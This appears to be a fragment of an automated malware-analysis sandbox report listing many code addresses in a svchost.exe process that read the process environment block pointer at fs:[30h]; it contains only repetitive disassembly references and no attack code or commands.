Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6050 mov eax, dword ptr fs:[00000030h]	1_2_032B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032280A0 mov eax, dword ptr fs:[00000030h]	1_2_032280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C80A8 mov eax, dword ptr fs:[00000030h]	1_2_032C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F60B8 mov eax, dword ptr fs:[00000030h]	1_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F60B8 mov ecx, dword ptr fs:[00000030h]	1_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323208A mov eax, dword ptr fs:[00000030h]	1_2_0323208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_0322A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032380E9 mov eax, dword ptr fs:[00000030h]	1_2_032380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B60E0 mov eax, dword ptr fs:[00000030h]	1_2_032B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322C0F0 mov eax, dword ptr fs:[00000030h]	1_2_0322C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032720F0 mov ecx, dword ptr fs:[00000030h]	1_2_032720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B20DE mov eax, dword ptr fs:[00000030h]	1_2_032B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]	1_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326C720 mov eax, dword ptr fs:[00000030h]	1_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]	1_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326273C mov ecx, dword ptr fs:[00000030h]	1_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326273C mov eax, dword ptr fs:[00000030h]	1_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AC730 mov eax, dword ptr fs:[00000030h]	1_2_032AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326C700 mov eax, dword ptr fs:[00000030h]	1_2_0326C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230710 mov eax, dword ptr fs:[00000030h]	1_2_03230710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03260710 mov eax, dword ptr fs:[00000030h]	1_2_03260710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238770 mov eax, dword ptr fs:[00000030h]	1_2_03238770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770 mov eax, dword ptr fs:[00000030h]	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326674D mov esi, dword ptr fs:[00000030h]	1_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]	1_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326674D mov eax, dword ptr fs:[00000030h]	1_2_0326674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230750 mov eax, dword ptr fs:[00000030h]	1_2_03230750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BE75D mov eax, dword ptr fs:[00000030h]	1_2_032BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]	1_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272750 mov eax, dword ptr fs:[00000030h]	1_2_03272750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B4755 mov eax, dword ptr fs:[00000030h]	1_2_032B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032307AF mov eax, dword ptr fs:[00000030h]	1_2_032307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E47A0 mov eax, dword ptr fs:[00000030h]	1_2_032E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D678E mov eax, dword ptr fs:[00000030h]	1_2_032D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]	1_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]	1_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032527ED mov eax, dword ptr fs:[00000030h]	1_2_032527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BE7E1 mov eax, dword ptr fs:[00000030h]	1_2_032BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]	1_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032347FB mov eax, dword ptr fs:[00000030h]	1_2_032347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323C7C0 mov eax, dword ptr fs:[00000030h]	1_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B07C3 mov eax, dword ptr fs:[00000030h]	1_2_032B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324E627 mov eax, dword ptr fs:[00000030h]	1_2_0324E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03266620 mov eax, dword ptr fs:[00000030h]	1_2_03266620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03268620 mov eax, dword ptr fs:[00000030h]	1_2_03268620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323262C mov eax, dword ptr fs:[00000030h]	1_2_0323262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE609 mov eax, dword ptr fs:[00000030h]	1_2_032AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324260B mov eax, dword ptr fs:[00000030h]	1_2_0324260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03272619 mov eax, dword ptr fs:[00000030h]	1_2_03272619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]	1_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]	1_2_032F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]	1_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]	1_2_0326A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03262674 mov eax, dword ptr fs:[00000030h]	1_2_03262674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324C640 mov eax, dword ptr fs:[00000030h]	1_2_0324C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326C6A6 mov eax, dword ptr fs:[00000030h]	1_2_0326C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032666B0 mov eax, dword ptr fs:[00000030h]	1_2_032666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]	1_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]	1_2_03234690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]	1_2_032AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]	1_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]	1_2_032B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A6C7 mov eax, dword ptr fs:[00000030h]	1_2_0326A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]	1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]	1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]	1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]	1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]	1_2_0325E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C6500 mov eax, dword ptr fs:[00000030h]	1_2_032C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]	1_2_03304500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]	1_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]	1_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]	1_2_0326656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]	1_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]	1_2_03238550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]	1_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]	1_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]	1_2_032B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]	1_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]	1_2_032545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03232582 mov eax, dword ptr fs:[00000030h]	1_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03232582 mov ecx, dword ptr fs:[00000030h]	1_2_03232582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03264588 mov eax, dword ptr fs:[00000030h]	1_2_03264588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E59C mov eax, dword ptr fs:[00000030h]	1_2_0326E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]	1_2_0325E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032325E0 mov eax, dword ptr fs:[00000030h]	1_2_032325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]	1_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]	1_2_0326C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]	1_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]	1_2_0326E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032365D0 mov eax, dword ptr fs:[00000030h]	1_2_032365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]	1_2_0326A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]	1_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]	1_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]	1_2_0322E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322C427 mov eax, dword ptr fs:[00000030h]	1_2_0322C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]	1_2_032B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]	1_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]	1_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]	1_2_03268402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BC460 mov ecx, dword ptr fs:[00000030h]	1_2_032BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]	1_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]	1_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]	1_2_0325A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]	1_2_0326E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EA456 mov eax, dword ptr fs:[00000030h]	1_2_032EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322645D mov eax, dword ptr fs:[00000030h]	1_2_0322645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325245A mov eax, dword ptr fs:[00000030h]	1_2_0325245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032364AB mov eax, dword ptr fs:[00000030h]	1_2_032364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032644B0 mov ecx, dword ptr fs:[00000030h]	1_2_032644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BA4B0 mov eax, dword ptr fs:[00000030h]	1_2_032BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EA49A mov eax, dword ptr fs:[00000030h]	1_2_032EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032304E5 mov ecx, dword ptr fs:[00000030h]	1_2_032304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]	1_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]	1_2_0325EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]	1_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]	1_2_032F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03304B00 mov eax, dword ptr fs:[00000030h]	1_2_03304B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]	1_2_032AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322CB7E mov eax, dword ptr fs:[00000030h]	1_2_0322CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]	1_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]	1_2_032E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]	1_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]	1_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]	1_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]	1_2_03302B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]	1_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]	1_2_032C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FAB40 mov eax, dword ptr fs:[00000030h]	1_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D8B42 mov eax, dword ptr fs:[00000030h]	1_2_032D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03228B50 mov eax, dword ptr fs:[00000030h]	1_2_03228B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DEB50 mov eax, dword ptr fs:[00000030h]	1_2_032DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]	1_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]	1_2_03240BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_032E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]	1_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]	1_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]	1_2_03238BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325EBFC mov eax, dword ptr fs:[00000030h]	1_2_0325EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_032BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]	1_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]	1_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]	1_2_03250BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]	1_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]	1_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]	1_2_03230BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_032DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326CA24 mov eax, dword ptr fs:[00000030h]	1_2_0326CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325EA2E mov eax, dword ptr fs:[00000030h]	1_2_0325EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]	1_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]	1_2_03254A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BCA11 mov eax, dword ptr fs:[00000030h]	1_2_032BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]	1_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]	1_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]	1_2_0326CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DEA60 mov eax, dword ptr fs:[00000030h]	1_2_032DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]	1_2_032ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]	1_2_032ACA72
